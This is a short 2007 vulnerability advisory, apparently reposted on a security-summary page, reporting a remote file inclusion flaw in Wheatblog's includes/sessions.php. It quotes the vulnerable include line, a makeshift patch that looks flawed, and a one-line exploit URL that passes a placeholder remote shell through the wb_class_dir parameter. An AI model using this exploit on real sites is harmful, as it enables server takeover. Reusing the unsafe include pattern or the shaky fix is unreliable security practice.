Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

MySpace Scripts - Poll Creator JavaScript Injection Vulnerability

Remote Shell Command Execution in "KB- Bestellsystem" (amensa-soft. de)

MyBlog (MyCMS) Remote PHP Code execution / PHP Code injection ..

Aria-Security.net: NetAuctionHelp SQL Injection

From:	HACKERS PAL <security_(at)_soqor.net>
Date:	22.11.2007
Subject:	Wheatblog (wB) Remote File inclusion ..

Hello,,

Wheatblog (wB) Remote File inclusion ..

tested on 1.1 and older versions are injected

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net

Remote File Inclusion
file : includes/sessions.php

line 2 :
code:-
include_once("$wb_class_dir/classDatabase.php");

variable wb_class_dir can be controlled and edited to be included from remote ..

Solution

replace
code :-
include_once("$wb_class_dir/classDatabase.php");

with
code:-
// Protected By : HACKERS PAL
// Security@soqor.net
// Http://WwW.SoQoR.NeT

if(eregi("sessions.php",$PHP_SELF) || isset($_GLOBALS['wb_class_dir']))
{
die("<h1>Forbidden 403<br> Protected By : HACKERS PAL</h1>");
}
include_once("$wb_class_dir/classDatabase.php");


Exploit : -
includes/sessions.php?wb_class_dir=[Ev!1-Sh311]?

#WwW.SoQoR.NeT